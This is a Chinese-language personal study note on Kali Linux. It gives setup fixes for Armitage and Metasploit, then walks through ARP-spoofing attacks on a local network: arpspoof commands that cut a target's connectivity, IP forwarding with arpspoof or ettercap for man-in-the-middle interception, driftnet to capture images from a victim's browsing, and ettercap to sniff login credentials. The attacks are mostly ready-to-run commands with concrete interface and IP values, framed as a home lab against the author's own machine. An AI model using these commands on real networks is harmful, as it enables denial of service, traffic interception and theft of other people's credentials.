kail-linux 安全之旅

一些学习网站

http://xiao106347.blog.163.com/blog/static/2159920782013111995945233/

http://xiao106347.blog.163.com/blog/static/21599207820146302851904/

http://xiao106347.blog.163.com/blog/static/215992078201352055231824/

下载系统：http://www.cnblogs.com/CyLee/p/5726521.html

终端输入armitage,然后一直确认即可

出现异常尝试如下几个步骤

1、命令行输入service postgresql start（或者/etc/init.d/postgresql start）

2、找到图形界面把metasploit framework打开，会自动创建数据库，自动连接(或者尝试msfdb start + msfconsole，反正我是没用)

3、再次使用armitage

arpspoof攻击局域网（虚拟机攻击本机）

注意，必须将虚拟机网络设置为【桥接模式】

arpspoof -i 【我的网卡】 -t 【攻击目标ip】 【攻击目标默认网关】

【我的网卡】：虚拟机中打开终端，输入ifconfig查看，通常都是eth0;

【攻击目标ip】:本机中打开终端，输入ifconfg查看，我的是192.168.1.101,我是通过打开【网络适配器】查看的

【攻击目标默认网关ip】:本机中打开终端，输入ifconfg查看，通常是192.168.1.1,我是通过打开【网络适配器->高级->tcp/ip】查看的

然后在虚拟机输入此demo:

arpspoof -i eth0 -t 192.168.1.101 192.168.1.1

这样本机就无法访问网络了。按ctrl+c结束

获取局域网内攻击目标的图片

echo 1 >/proc/sys/net/ipv4/ip_forward      #默认是0，通过这行修改为1,这种方式叫【ip转发】此时不会有断网现象了

arpspoof -i eth0 -t 192.168.1.101 192.168.1.1  #这种方式叫【arp欺骗】

ettercap -i eth0 -Tq -M arp:remote /192.168.1.103// /192.168.1.1//  #【arp欺骗】,如果上面的欺骗+截取没有效果，可以尝试使用这个

另开一个终端，使用如下命令截取图片流量。然后目标电脑打开任何带图片的网站如QQ空间

driftnet -i eth0  #浏览图片截取（本人MAC系统以及MAC系统上的虚拟机都无法使用该功能）

（ps：可以通过arp -a 来获取欺骗的成果，如果发现两个类型为【动态】的ip分别为目标和网关即可，mac电脑暂时无法看出是否被欺骗）

获取局域网内攻击目标的登录信息

也需要先arp欺骗+ip转发

ettercap -Tq -i eth0 #登录账号密码截取（暂时无法实现）